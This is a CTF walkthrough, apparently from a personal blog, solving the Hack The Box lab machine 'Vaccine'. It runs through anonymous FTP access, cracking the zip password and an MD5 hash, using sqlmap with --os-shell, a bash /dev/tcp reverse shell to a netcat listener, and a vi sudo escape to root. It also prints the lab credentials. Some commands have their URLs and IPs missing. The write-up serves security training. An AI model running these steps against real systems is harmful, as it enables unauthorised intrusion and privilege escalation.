top of page



As usual let's start with nmap:

nmap -sV -sC IP

Replace IP by the IP of your target machine (Vaccine)

The IP of the target machines are always changing so make sure you type the correct one. You can find it on your Hack The Box account.

We can see that port 21 which is associated with FTP is open and that Anonymous FTP login is allowed so let's try that.


When prompted for a username, type anonymous and press enter

You will now be prompted to enter the password

For the password just press enter.

We have now successfully login using anonymous as the username and with no password!



We can see that there is a file called Let's try to download it to our VM using:


The zip file should now be saved on your VM. Just go to your home directory

We collected what we needed so we can now exit the ftp session by typing:


Let's now open a new command prompt window and type:


Let's now try to unzip the zip file by typing:


It is asking for a password to unzip the file. Just press enter

We do not have the password, but let's use John The Ripper to crack it.

If you are not familiar with John The Ripper, or if you need a quick refresher, check out my short post on the basics before continuing.

zip2john > hash.txt

john --wordlist=/opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt hash.txt

john --show hash.txt

We cracked the password! The password is 741852963

Now let's try to unzip it again.


Type in the password:


and press enter

The zip file had 2 files into it:

index.php and style.css

Let's check them out:

cat index.php

Looks like we found some credentials! Username admin and its password hash


We can use Crackstation at to find out the password:

- Copy the hash we just found 2cb42f8734ea607eefed3b70af13bbd3

- Paste it into the password hash cracker

- Tick I'm not a robot

- Click on Crack Hashes

We cracked the password!

The password is qwerty789

When we ran our nmap earlier, we also found that port 80 was opened which is associated with HTTP. So let's open a new browser window from our VM to check it out by typing in the url bar:

We are asked for some credentials to login. We just found the following credentials so let's try that:

Username: admin

Password: qwerty789

and click on Sign In

We are in!


The website holds a Car Catalogue. Note the url is

Now let's try to look for a specific car name. In the search field, type the word Sandy for instance and press enter.

We can now see the url changed to

We can test it out with a few different search but looks like there is a query that uses

?search= followed by whatever we typed in in the search bar

This might be connected with a database... Let's use sqlmap to see if it is vulnerable to SQL injections.

First let's find the cookie session.

To do that right click on the page and select Inspect Element

Now click on the tab Storage

The PHPSESSID should be displayed as per below:


Note that your PHPSESSID will be different that mine.

If you are not familiar with sqlmap or if you need a quick refresher, check out my short post on the sqlmap basics before continuing with this machine.

Let's use our sqlmap:

sqlmap --url="" --cookie="PHPSESSID=530lii3ob5pbh3hii8rifld73o" --os-shell

We got the shell!

Now open a brand new command prompt window and type:

nc -lnvp 4444

Now, return to your sqlmap shell and type:

bash -c "bash -i >& /dev/tcp/ 0>&1" 
The IP is the IP of your Virtual Machine. Your IP will be different than mine. If you don't know the IP of your VM, open a new command prompt window and type ifconfig

Just press enter

Now let's return to our netcat and we should have a session!

We got the shell! Now let's make the shell stable using:

python3 -c 'import pty;pty.spawn("/bin/bash")'

cd ..

cd ..


cat user.txt

You got the flag!


Privilege Escalation

As usual with privilege escalation, let's start with:

sudo -l

It is asking us for the password and we don't have it

Let's try to find the password in the directory /var/www/html

cd /var/www/html


Let's check out dashboard.php

 cat dashboard.php | grep password

We found the password for user posgres


We can keep trying from here but the shell might die soon so let's use the credentials we found to ssh into it directly.

Let's open a new command prompt window. We know from the nmap scan at the beginning that port 22 is open which is associated with ssh. And we now have the credentials for user posgres!

ssh postgres@ is the IP of the target machine. The IP of the target machine changes all the time so yours will be different.



We are now prompted to enter the password for username postgress.

The password is:


We are in!



We can find user.txt file here too

sudo -l

Enter the password again


So it seems like we are able to edit pg_hba.conf using vi text editor. Let's now type:

sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf

We can escalate our privilege using the following command:

:set shell=/bin/sh 


Now we get the shell!



cd /root


cat root.txt


Congratulations! You got the root flag!

5,798 views0 comments

Recent Posts

See All


Rated 0 out of 5 stars.
No ratings yet

Add a rating
bottom of page